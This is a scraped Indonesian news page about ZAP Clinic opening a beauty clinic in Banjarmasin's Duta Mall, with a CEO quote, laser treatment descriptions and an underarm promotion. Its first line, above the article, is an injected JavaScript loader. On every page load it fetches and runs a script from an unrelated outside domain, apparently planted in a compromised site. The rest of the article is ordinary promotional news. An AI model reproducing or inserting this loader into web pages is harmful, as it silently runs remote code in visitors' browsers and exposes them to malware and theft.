(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Lifestyle

ZAP Clinic Hadir di Duta Mall, Perawatan Kecantikan Membidik Perempuan Milenial


KANALKALIMANTAN.COM, BANJARMASIN – Tren perawatan kecantikan kian berkembang di Kota Banjarmasin.

Kesadaran masyarakat pentingnya merawat kulit mendorong produksi skincare dan klinik kecantikan bersaing ketat berikan pelayanan terbaik di Banjarmasin.

Terbaru, klinik kecantikan dan kesehatan ZAP meresmikan cabang ZAP Clinic terbaru dan pertama di Banjarmasin.

Lokasi outlet di Duta Mall Banjarmasin, ZAP Clinic telah aktif melayani pelanggan sejak 13 April 2023.

Baca juga: Polisi Aniaya dan Ludahi ART, Kapolda Kalsel Perintah Harus Disanksi Tegas

Jika bicara soal klinik kecantikan, ZAP menjadi salah satu klinik kecantikan lokal yang cukup eksis.

“Dengan cabang Banjarmasin ini, ZAP ingin menjangkau lebih banyak perempuan yang ingin memberikan perawatan terbaik. Terutama kepada anak muda untuk merawat diri tak hanya terbatas pada produk-produk skincare yang tengah populer. Semakin banyak anak muda yang tertarik untuk melakukan perawatan di klinik kecantikan,” kata CEO ZAP Group Fadly Sahab, Kamis (4/5/2023) siang.

ZAP Clinic Banjarmasin di Duta Mall Banjarmasin Lantai 2 memberikan layanan kesehatan kulit dengan perawatan unggulan. Foto: wanda

Tak hanya menarik kaum milenial saja, ZAP sebagai klinik kesehatan dan kecantikan terbesar di Indonesia turut menawarkan perawatan untuk mengatasi segala permasalahan kulit perempuan.

Pelayanan yang diberikan tak tanggung-tanggung. Dengan konsep hospitality berbintang, ZAP memberikan sistem booking yang praktis dan tepat waktu, serta penanganan prima oleh dokter dan tenaga medis profesional.

ZAP Clinic Banjarmasin di Duta Mall Banjarmasin Lantai 2 memberikan layanan kesehatan kulit dengan perawatan unggulan. Foto: wanda

“Hal ini membuat pelanggan kami sangat beragam, tak hanya dewasa muda atau yang lebih senior, tapi juga yang masih sekolah dan kuliah,” sambungnya.

Baca juga: Tangkal Radikalisme dan Hoaks, Kesbangpol Banjar Gelar Sosialisasi

Sejak didirikan pada 2009, ZAP telah menangani lebih dari enam juta prosedur yang mengedepankan teknologi berbasis laser dan cahaya.

“Kami ingin menunjukkan bahwa perawatan kelas dunia dengan teknologi laser terkini dapat dinikmati dengan harga yang terjangkau,” ungkapnya.

Pada momen Soft Opening ZAP Clinic Banjarmasin ini juga, ZAP juga memberikan perawatan gratis bagi rekan jurnalis untuk merasakan manfaat dari perawatan unggulan ZAP.

Hal ini merupakan bentuk apresiasi atas dukungan para jurnalis yang menjadi salah satu bagian penting dari perjalanan ZAP sejak 2009.

Selama masa pembukaan, ZAP menawarkan promo yaitu Treatment Underarm seharga Rp 99.500. Promo ini bisa didapatkan dengan menghubungi kontak ZAP Clinic Banjarmasin pada akun Instragram @zap.banjarmasin atau Instagram @zapcoid.

Favoritnya, ZAP menawarkan combo treatment untuk Underarm dengan inovasi dan riset yang dilakukan oleh tim medis ZAP dengan menggabungkan teknologi berbasis cahaya dan laser.

Rangkaian dua teknologi dalam treatment ini telah terbukti ampuh dan aman, bahkan mencapai hasil yang lebih baik dari single teknologi.

Baca juga: Jurnalis Kanalkalimantan Juara 1 Lomba Penulisan Pekan Imunisasi Dunia 2023

“Meskipun tidak instan dan memerlukan waktu kurang lebih 12 kali namun Combo Treatment ini menjadi favorit banyak wanita untuk menghilangkan bulu, dengan lebih efektif, sekaligus memperbaiki tekstur kulit pada tubuh,” jelas sang owner.

Hasil maksimal akan didapatkan lebih cepat dibandingkan perawatan yang menggunakan satu (single) teknologi, bahkan untuk menghilangkan bulu tubuh yang tipis, dan sulit dihilangkan.

Selain dapat menghilangkan rambut di tubuh, teknologi combo juga dapat digunakan

untuk merawat kulit tubuh menjadi lebih halus, kencang, sehat, dan meratakan tekstur kulit.

Sementara itu untuk perawatan kulit wajah, ZAP menawarkan perawatan Photo Facial Glow dan Photo Facial Acnez yang juga merupakan favorit banyak wanita untuk segala solusi wajah. (Kanalkalimantan.com/wanda)

Reporter: wanda
Editor: bie


Al Ghifari

Recent Posts

Dilakban di Paha, Empat Orang di Bandara Juwata Tarakan Selundupkan 4 Kg Sabu

KANALKALIMANTAN.COM, TARAKAN - Empat orang calon penumpang pesawat dengan rute Tarakan-Makassar batal berangkat lantaran kedapatan… Read More

8 jam ago

Satgas TMMD Bikin Sumur Bor untuk Warga Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Pengerjaan sumur bor menjadi salah satu sasaran fisik program TNI Manunggal Membangun… Read More

10 jam ago

Jemaah Termuda Kloter 1 Daftar Haji saat Umur 10 Tahun, Setor 2014 Berangkat 2024

KANALKALIMANTAN.COM, BANJARBARU - Berangkat haji ke Baitullah menunaikan Rukun Islam kelima sepenuhnya adalah panggilan. Berusia… Read More

13 jam ago

Embarkasi Banjarmasin Berangkatkan 5.759 JCH Kalsel-Kalteng, Pelayanan Penuh Jemaah Lansia

KANALKALIMANTAN.COM, BANJARBARU - Sebanyak 4.071 jemaah calon haji (JCH) asal Kalimantan Selatan (Kalsel) akan berangkat… Read More

13 jam ago

Caleg Terpilih Tak Harus Mundur Jika Maju Pilkada, Begini Penjelasan Ketua KPU Kalsel

KANALKALIMANTAN.COM, BANJARMASIN - Caleg Anggota Dewan Perwakilan Rakyat (DPR), Anggota Dewan Perwakilan Rakyat Daerah (DPRD)… Read More

15 jam ago

Lepas Keberangkatan 320 Calon Haji, Ini Pesan Bupati Banjar

KANALKALIMANTAN.COM, MARTAPURA - Bagian dalam dan luar halaman Mahligai Sultan Adam di Jalan A Yani… Read More

16 jam ago

This website uses cookies.